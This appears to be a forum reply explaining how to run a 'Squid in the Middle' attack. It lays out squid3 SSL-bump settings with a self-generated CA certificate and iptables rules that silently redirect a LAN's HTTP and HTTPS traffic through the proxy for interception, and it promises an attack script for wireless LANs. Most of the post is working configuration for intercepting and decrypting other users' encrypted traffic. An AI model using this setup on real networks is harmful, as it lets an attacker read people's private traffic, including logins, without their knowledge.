Hi there!
There are a lot of things that have to being done to successfully perform a "Squid in the Middle" attack. Squid it's a HUGE chapter.
First of all you can not redirect port 443 if squid3 has not being compiled with SSL bump and dynamic SSL generation. (you will find many informations into the Internet about how to do that). Squid 3.1.2 from Kali's repos don't offer that and as far as I know none do. You have to compile it by your self.
Code:
squid3 -v
Squid Cache: Version 3.1.20
configure options: '--build=i486-linux-gnu' '--prefix=/usr' '--includedir=${prefix}/include' '--mandir=${prefix}/share/man' '--infodir=${prefix}/share/info' '--sysconfdir=/etc' '--localstatedir=/var' '--libexecdir=${prefix}/lib/squid3' '--srcdir=.' '--disable-maintainer-mode' '--disable-dependency-tracking' '--disable-silent-rules' '--datadir=/usr/share/squid3' '--sysconfdir=/etc/squid3' '--mandir=/usr/share/man' '--with-cppunit-basedir=/usr' '--enable-inline' '--enable-async-io=8' '--enable-storeio=ufs,aufs,diskd' '--enable-removal-policies=lru,heap' '--enable-delay-pools' '--enable-cache-digests' '--enable-underscores' '--enable-icap-client' '--enable-follow-x-forwarded-for' '--enable-auth=basic,digest,ntlm,negotiate' '--enable-basic-auth-helpers=LDAP,MSNT,NCSA,PAM,SASL,SMB,YP,DB,POP3,getpwnam,squid_radius_auth,multi-domain-NTLM' '--enable-ntlm-auth-helpers=smb_lm,' '--enable-digest-auth-helpers=ldap,password' '--enable-negotiate-auth-helpers=squid_kerb_auth' '--enable-external-acl-helpers=ip_user,ldap_group,session,unix_group,wbinfo_group' '--enable-arp-acl' '--enable-esi' '--enable-zph-qos' '--enable-wccpv2' '--disable-translation' '--with-logdir=/var/log/squid3' '--with-pidfile=/var/run/squid3.pid' '--with-filedescriptors=65536' '--with-large-files' '--with-default-user=proxy' '--enable-linux-netfilter' 'build_alias=i486-linux-gnu' 'CFLAGS=-g -O2 -fPIE -fstack-protector --param=ssp-buffer-size=4 -Wformat -Werror=format-security -Wall' 'LDFLAGS=-fPIE -pie -Wl,-z,relro -Wl,-z,now' 'CPPFLAGS=-D_FORTIFY_SOURCE=2' 'CXXFLAGS=-g -O2 -fPIE -fstack-protector --param=ssp-buffer-size=4 -Wformat -Werror=format-security' --with-squid=/build/squid3-tMZN4r/squid3-3.1.20
Second the squid.conf file has to be in right form and the rules (ACLs) has to be in correct form. (Where is your squid.conf?)
ex:
Code:
acl localnet src 192.168.60.0/24 # My LAN
acl safeports port 21 70 80 210 280 443 488 563 591 631 777 901 81 3127-3129 1025-65535
acl sslports port 443 563 81 2087 8081 10000
acl connect method CONNECT
http_access allow manager localhost
http_access deny manager
http_access deny !safeports
http_access deny CONNECT !sslports
http_access allow localhost
http_access allow localnet
http_access deny all
always_direct allow all # Critical!
ssl_bump server-first all # Critical!
# Ports :3127 http proxy, 3128 http transparent, 3129 https transparent.
http_port 3127 # Critical!
http_port 3128 intercept # Critical!
https_port 3129 intercept ssl-bump generate-host-certificates=on dynamic_cert_mem_cache_size=4MB cert=/../.../certificates/personal-ca.pem key=/../../certificates/personal-ca.pem # Critical!
sslcrtd_program /usr/lib/squid3/ssl_crtd -s /var/lib/ssl_db -M 4MB
sslcrtd_children 10 startup=5 idle=2
# Place your DNS servers here
dns_nameservers DNS1 DNS2
hierarchy_stoplist cgi-bin ?
# Memory Cache Options 512 MB of RAM
cache_mem 512 MB
maximum_object_size_in_memory 5MB
refresh_pattern ^ftp: 1440 20% 10080
refresh_pattern ^gopher: 1440 0% 1440
refresh_pattern -i (/cgi-bin/|\?) 0 0% 0
refresh_pattern . 0 20% 4320
coredump_dir /var/spool/squid3
access_log stdio:/var/log/squid3/access.log squid
As you can see I've already create a CA root certificate (personal-ca.pem) which is being used in squid3.
iptables in the previous squid.conf file should look something like this (I m not using ARPspoof):
Code:
# Enable IPv4 forward
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface IFACE -j MASQUERADE
iptables --append FORWARD --in-interface LANFACE -j ACCEPT
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to INETIP
# Transparent Squid3 Http & Https (Squid3 listens to 3128 (http traffic transparent) and 3129 (https traffic transparent)
# localhost can access Squid3 to 3127 normal http proxy traffic
iptables -t nat -A PREROUTING -i LANFACE -p tcp -m tcp --dport 80 -j DNAT --to-destination 192.168.60.129:3128
iptables -t nat -A PREROUTING -i LANFACE -p tcp -m tcp --dport 443 -j DNAT --to-destination 192.168.60.129:3129
iptables -t nat -A PREROUTING -i IFACE -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 3128
iptables -t nat -A PREROUTING -i IFACE -p tcp -m tcp --dport 443 -j REDIRECT --to-ports 3129
Where:
IFACE=your internet interace (eg eth0)
INETIP=IP from Internet interface
LANFACE=your lan interface that your trying to intercept eg eth1
I suggest you trying first of all to setup a transparent proxied LAN and then move forward to a more advanced subject as SSL intercepted LAN. Luckily there are a lot of info into the Intenet to accomplish that or any other task that you will decide to use. It's crucial to understand what are you doing before to try it. I'm trying to say that just following another's guy instructions about how to do that it's not enough. You HAVE to understand what you are doing.
If you have enough patience I will upload in a month a so, a script where a Squid in the middle attack in a wireless LAN is included.
Good luck!
PS Please don't ask for a "private" solution to your e-mail. It's a good thing to get solutions publicly. I'm sure that other people will face the exactly same problems as you are
PS2 access.log and cache.log are your friends.